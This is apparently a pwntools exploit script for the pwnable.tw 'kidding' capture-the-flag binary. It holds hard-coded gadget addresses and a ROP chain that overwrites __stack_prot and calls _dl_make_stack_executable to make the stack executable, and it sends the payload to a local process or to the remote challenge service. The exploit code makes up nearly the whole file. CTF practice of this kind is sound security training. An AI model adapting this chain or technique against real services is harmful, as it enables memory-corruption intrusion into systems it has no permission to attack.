"""Pwntools script for the `kidding` binary (pasted as a flat script).

Every address below is hard-coded for the page's build of the binary and is
not meaningful for any other build. With `local = True` the script spawns the
binary locally; otherwise it connects to the remote service. A debugger is
attached to the target before the payload is sent.

Written in Python 2 style: `padding` is a `str` and is concatenated directly
with the `p32` output, which is only valid where `str` and `bytes` coincide.
"""
from pwn import *

local = True
if local:
    r = process("./kidding")
else:
    # nc chall.pwnable.tw 10303
    r = remote("chall.pwnable.tw", 10303)

# Filler placed before the chain (0x10 = 16 bytes); presumably reaches a
# saved return address - confirm against the binary.
padding = "a" * 0x10

# Symbol addresses inside the target, as given on the page.
libc_stack_end = 0x080e9fc8
stack_prot = 0x080e9fec
stack_executable = 0x0809a080

# Gadget addresses, as given on the page.
pop_eax_ret = 0x080b8536  # pop eax ; ret
mov_ret = 0x0805462b      # mov dword ptr [edx], eax ; ret
pop_edx_ret = 0x0806ec8b  # pop edx ; ret

# One 32-bit little-endian word per entry, in stack order. Read literally,
# the gadgets do: eax = 7; edx = stack_prot; [edx] = eax;
# eax = libc_stack_end; then return into stack_executable, with 0x61616161
# left as the word that follows it.
chain = [
    pop_eax_ret, 7,
    pop_edx_ret, stack_prot,
    mov_ret,
    pop_eax_ret, libc_stack_end,
    stack_executable, 0x61616161,
]
payload = padding + "".join(p32(word) for word in chain)

gdb.attach(r)
r.sendline(payload)